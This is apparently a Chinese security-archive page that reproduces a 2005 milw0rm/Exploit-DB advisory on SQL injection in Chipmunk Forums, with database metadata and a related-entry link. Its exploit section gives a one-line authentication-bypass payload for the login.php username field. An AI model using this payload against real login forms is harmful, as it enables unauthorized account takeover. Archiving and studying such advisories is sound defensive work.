Chipmunk Forums – SQL Injection

Chipmunk Forums – SQL Injection

漏洞ID 1054896 漏洞类型
发布时间 2005-02-10 更新时间 2005-02-10
图片[1]-Chipmunk Forums – SQL Injection-安全小百科CVE编号 N/A
图片[2]-Chipmunk Forums – SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/809
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*==========================================*/
// GHC -> Chipmunk forum <- ADVISORY
// Product: Chipmunk Forums
// URL: http://www.chipmunk-scripts.com/board
// VULNERABILITY CLASS: SQL injection
// RISK: hight
/*==========================================*/

[exploit]
at login.php enter user name as
Administrator'/*

# milw0rm.com [2005-02-10]

相关推荐: EPIC PRIVMSG Remote Heap Corruption Vulnerability

EPIC PRIVMSG Remote Heap Corruption Vulnerability 漏洞ID 1100658 漏洞类型 Boundary Condition Error 发布时间 2003-03-14 更新时间 2003-03-14 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享